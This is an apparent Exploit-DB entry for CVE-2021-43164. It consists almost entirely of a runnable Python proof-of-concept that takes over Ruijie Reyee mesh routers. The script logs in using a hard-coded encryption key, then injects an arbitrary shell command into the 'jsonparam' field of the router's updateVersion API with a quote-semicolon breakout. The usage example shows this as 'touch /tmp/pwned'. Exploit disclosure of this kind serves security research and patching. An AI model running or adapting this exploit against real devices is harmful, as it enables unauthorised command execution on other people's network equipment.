Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)

EDB-ID:

50930


Author:

Minh Khoa

Type:

remote


Platform:

Hardware

Date:

2022-05-11


# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
# Google Dork: None
# Date: November 1, 2021
# Exploit Author: Minh Khoa of VSEC
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/resources/products/1896-1900
# Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
# CVE: CVE-2021-43164

#!/usr/bin/python3

import os
import sys
import time
import requests
import json

def enc(PASS):
    key   = "RjYkhwzx$2018!"
    shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key)
    return os.popen(shell).read().strip()

try:
    TARGET  = sys.argv[1]
    USER    = sys.argv[2]
    PASS    = sys.argv[3]
    COMMAND = sys.argv[4]
except Exception:
    print("CVE-2021-43164 PoC")
    print("Usage:   python3 exploit.py <target> <user> <pass> <command>")
    print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'")
    sys.exit(1)

endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET)
payload = {
        "method": "login",
        "params": {
            "username": USER,
            "password": enc(PASS),
            "encry": True,
            "time": int(time.time()),
            "limit": False
            }
        }

r = requests.post(endpoint, json=payload)
sid = json.loads(r.text)["data"]["sid"]

endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid)
payload = {
        "method": "updateVersion",
        "params": {
            "jsonparam": "'; {} #".format(COMMAND)
            }
        }

r = requests.post(endpoint, json=payload)
print(r.text)